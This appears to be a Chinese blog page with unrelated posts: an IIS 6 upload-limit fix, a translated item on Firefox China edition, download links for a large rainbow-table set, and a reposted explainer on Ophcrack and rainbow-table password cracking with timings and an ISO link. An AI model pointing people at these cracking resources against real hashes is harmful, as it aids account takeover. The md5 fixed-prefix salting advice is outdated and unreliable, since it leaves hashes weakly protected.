但这个代码在我使用的过程中,有时有用,有时没用,感觉很郁闷,重装系统后就可以,过一段时间就不可以,这次是为了研究这个,找了一堆网页,网上这代码流传太广了,虽然解决不了问题,还在microsoft的"我的wmi坏了"上排除了一遍,还是没找到问题所在,不过他给了我个提示,可能是命名空间不存在,起初我想有时可以有时不可以,不应该是不存在呀,最后发现'W3SVC/1/ROOT'这个东西我的机器上根本就没有,而重装的系统上有这个,想了想,这里的"1"不会是IIS的默认站点吧,安全需要,每次做安全设置时把这个站点都删除了,当然没有了,马上试了一下,NND,得亏我虚拟计算机多,试起来容易,真是这个问题,只有没有这个站点就会有这样的错误提示(呵呵,两个版,一个中文版提示,一个英文版提示,为了研究这个把好多个版本都搬出来了):

---------------------------
Windows 脚本宿主
---------------------------
脚本: D:\My system\桌面\200K.vbs
行: 2
字符: 1
错误: 系统找不到指定的路径。
代码: 80070003
源: SWbemServicesEx

---------------------------
确定
---------------------------

---------------------------
Windows Script Host
---------------------------
Script: C:\Documents and Settings\Administrator\Desktop\200k.vbs
Line: 2
Char: 1
Error: The system cannot find the path specified.
Code: 80070003
Source: SWbemServicesEx

---------------------------
OK
---------------------------

呵呵,说远了,上面说到第一个代码是正确的,保存后直接双击这个文件运行就可以了,他会先显示当前允许上传的大小,然后显示修改后的大小

一般上面的操作一定成功。万一不成功的话呢:

二、直接修改配置文件

先在服务里关闭iis admin service服务
找到windows\system32\inetsrv\下的metabase.xml,
打开,找到ASPMaxRequestEntityAllowed 把他修改为需要的值,
然后重启iis admin service服务

也可以这样:Win+R-->cmd-->net stop iisadmin-->改windows\system32\inetsrv\下的 metabase.xml--->cmd-->net start iisadmin-->net start w3svc

三、下载微软IIS专用管理工具:

IIS6 Resource Kit Tools(http://www.microsoft.com/downloads/details.aspx?FamilyID=56FC92EE-A71A-4C73-B628-ADE629C89499&displaylang=en),安装后利用Metabase Explorer修改了(local)\LM\W3SVC\AspMaxRequestEntityAllowed属性(默认为 200K=204800),修改为1G就是了;同时修改了AspScriptTimeout属性调整下时限,就可以上传大文件了。




一、 脚本修改法win2003-200K.vbs[推荐]

这就造成了文件上传不能超过200k,而事实上是提交数据不能超过200k,你可以发一个很长的帖子试试,也会出现这个错误

解决办法:见此文第一个示例。

2008年11月25日星期二

[译稿]具有中国特色的 Firefox 浏览器

新闻来源:ReadWriteWeb.com
不同文化导致不同的上网习惯,在欧美,网民身体前倾,右手执鼠,左手敲键,很忙活,而中国的网民则身体靠在椅背上,右手移动鼠标,另一只手闲着。这是 Mozilla 公司的 Firefox 主管 Mike Beltzner 最近访问中国时发现的一个现象。



他表示,中国人倾向于让信息蹦出来然后对感兴趣的内容进行研究,而不象西方人那样出动去搜索相关资料,搜索虽然重要,但对中国人来说并不是首要的东西。为了适应这种不同的文化,Mozilla 在北京的机构谋智网络推出来 Firefox 中国版,以满足中国网民的上网习惯。



Firefox 中国版包含以下对中国用户来说非常实用的功能:

  • 那些欧美用户常用的快捷键被设计成可以直接用鼠标操作。
  • 借鉴了一些 Maxthon 功能,如双击关闭标签。
  • 工具条上有一个下拉框,可以快速访问一些常用的系统工具,如计算器,记事本,抓屏,图片编辑等。
  • 图片或重要内容拖存。
所有这些功能,被打包在 Firefox 中国版中,Firefox 中国版并非要取代 Firefox 中文版,而是作为一个拥有更多本地功能的选项供某些用户下载使用。

本文来源:http://www.readwriteweb.com/archives/firefox_china_edition_everything_a_local_browser_should_be.php
中文翻译:COMSHARP CMS

120G彩虹表HTTP下载

下载地址1 Http://hash.0x54.com 铁通
下载地址2 Http://hash2.0x54.com 电信
备用地址1 Http://hash.t00ls.net 铁通
备用地址2 Http://hash2.t00ls.net 电信

2008年11月23日星期日

认识彩虹哈希表破解工具 [军区国防部专用的]

跨平台密码破解器Ophcrack的破解速度简直是不可思议。到底有多快呢?它能在160秒内破解“Fgpyyih804423”这个密码。很多人 都认为这个密码已经相当安全了。微软的密码强度判定工具认为该密码的安全级别是“强”。而Geekwisdom密码强度估算器认为该密码的安全强度是“普 通”。

Ophcrack的破解速度为什么会这么快呢?这是因为它使用了彩虹表。我说的不是我用做桌面背景的那种真正的彩虹。

不过,彩虹表也是很美的。

要想理解彩虹表的工作原理,首先你得明白计算机是如何存储密码的,不管是在你自己用的台式机还是在远程的网络服务器那里。

密码决不会存储在纯文本文档中的。至少我们不应当这么做,除非你用的是世界上最幼稚的程序,而且你的目的就是构建世界上最不安全的系统。事实上,我 们应当把密码作为哈希函数的输出值来存储。哈希是单向操作。即使攻击者能够读取密码的哈希表,他也不可能仅仅通过那个哈希表来重构密码。

但是攻击者可以用用彩虹哈希表来攻击密码的哈希表:通过庞大的、针对各种可能的字母组合预先计算好的哈希值。攻击者的计算机当然也可以在运行中计算 所有的值,但是利用这个预先计算好哈希值的庞大表格,显然能够使攻击者能更快地执行级数规模的命令——假设攻击机器有足够大的RAM来将整个表存储到内存 中(或者至少是表的大部分)。这就是个很典型的时间-内存权衡问题,尤其是黑客更倾向于使用这种捷径。

彩虹表有多庞大呢?Ophcrack的安装对话话会让你有个大致概念:

生成这些庞大的彩虹表需要花很长时间,但是一旦生成好了,那么每个攻击的计算机都可以利用这些表来破解更强的密码哈希表。

可用的最小彩虹表是最基本的字母数字表,就这样它的大小就有388MB。这是Ophcrack启动盘默认的表。即使这个最小的表也相当有效了。我曾经用它来攻击我在一个Windows XP虚拟机上设置的密码,结果如下:

found? seconds
Password1! 700
Fgpyyih804423 yes 159
Fgpyyih80442% 700
saMejus9 yes 140
thequickbrownfoxjumpsoverthelazydog 700


当然,你用这种彩虹表无法破解那种带有非数字字母的字符的密码(比如%&^$#这样的),因为表里根本没有包含这些字符。你可能也注意到了那些 passphrase,我也很喜欢它们,由于它们本身的长度问题,passphrase对此项技术是免疫的。但是,话又说回来了,该攻击可以在11分钟内 破解所有可能14位数字字母密码组合中的99.9%,这还是用了最小的彩虹表。表越大、越全,攻击破解能力越强。Ophcrack文档描述了它所能使用的 彩虹表之间的差异:

字母数字表 10k 388MB 包含所有字母数字混合密码中99.9%的LanManager表。这些都是用大小写字母和数字组成的密码(大约800亿组合)。

由于LanManager哈希表将密码截成每份7个字符的两份,我们就可以用该表破解长度在1到14之间的密码。由于LanManager哈希表也是不区分大小写的,该表中的800亿的组合就相当于12*10的11次方(或者2的83次方)个密码。

字母数字表 5k 720MB 包含所有字母数字组合的密码中99.9%的LanManager表。但是,由于表变成2倍大,如果你的计算机有1GB以上的RAM空间的话,它的破解速度是前一个的4倍。

扩展表 7.5GB 包含最长14个大小写字母、数字以及下列33个特殊字符(!"#$%&'()*+,-./:;<=>?@[\]^_`{|} ~)组成的密码中96%的LanManager表。该表中大约有7兆的组合,5*10的12次方(或者2的92次方)密码。

NT 8.5 GB 我们可以使用该表来破解计算机上的NT哈希表,这是LanManager 哈希表所做不到的。该表包含了用如下字符组成的可能密码组合的90%:

·最高6位字符由大小写字母、数字以及33个特殊字符(同上面列举的一样)

·7 大小写字母及数字

·8 小写字母及数字

该表包含7兆种组合,对应7兆的密码(NT哈希表不存在LanManager哈希表的弱点)。

需要注意的是,所有这些彩虹表都有其特定适用的密码长度和字母组合。太长的密码,或者包含表中没有的字符,那么用彩虹表就无法破解。

不幸的是,由于旧式LanManager哈希表不可饶恕的缺点,Windows服务器特别容易被彩虹表攻击。令我吃惊的是,Windows Server 2003在默认状态下竟然还支持该旧式Lan Manager。我强烈建议大家禁用Lan Manager哈希表,尤其是在那些存储所有用户的域证书的服务器上一定要禁用该哈希表。这将对你的所有Windows98用户造成很大的不便,但是我觉 得为了提高安全性,这么做是值得的。

我听说明年发布的Windows Server2008最终会将LanManager哈希表去掉。Windows Vista已经不支持这些过时的哈希表了。在Vista系统中运行OphCrack的话结果请看下列对话框:

所有LM哈希表都是空的。请使用NT哈希表来破解剩余哈希表。我希望我能用NT表,但是我找不到要用8.5GBNT哈希的彩虹表的可靠来源。

Ophcrack工具不是很灵活。它不允许你自己生成彩虹表。因此,你得用Project彩虹破解工具,该工具能用来破解几乎所有字母组合以及任何 哈希算法。但是,你得当心,彩虹表攻击最近才盛行的原因是由于电脑的2-4GB的内存最近才达到了让人能接受的水平。我的意思是说它很庞大。

下面是攻击安全性能更高的NT哈希表所需要生成的彩虹表的大小:

Character Set Length Table Size
ABCDEFGHIJKLMNOPQRSTUVWXYZ 14 0.6 GB
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 14 3 GB
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+= 14 24 GB
ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()-_+=~`[]{}|\:;"'<>,.?/ 14 64 GB


通常对台式机来说,用彩虹表攻击太夸张了。如果黑客能实现物理意义上访问主机,那么就没有任何安全性可言了。这是10项计算机安全不可变法则中的第3条。一旦黑客可以在物理意义上访问主机,那么他可以用很多工具来重新设置密码。

但是如果远程黑客从服务器或者数据库获得大量的密码的哈希列表,我们就有麻烦了。这种情况下,我们遭受彩虹表攻击的风险非常大。因此你决不能只依靠 哈希技术——你总得给哈希表加些花样,这样得到的哈希值就与众不同了。给哈希表加花样,听起来很复杂(隐约还能感觉到很美味?),但其实很简单。在生成哈 希表之前,给密码加个唯一的前缀就行:

hash = md5('deliciously-salty-' + password)


这样,攻击者就无法用彩虹表来攻击你了——“密码”和“美味的鲜密码”生成的哈希结果是不匹配的。除非黑客知道你所有的哈希表都加了这个前缀。即使真的知道,他/她也得专门针对你的机器生成一个定制的彩虹表。

iso下载地址

http://jaist.dl.sourceforge.net/sourceforge/ophcrack/ophcrack-livecd-1.0.iso


本篇文章来源于 中国知音博客 转载请以链接形式注明出处 网址:www.bycnboy.comhttp://www.bycnboy.com/article.asp?id=816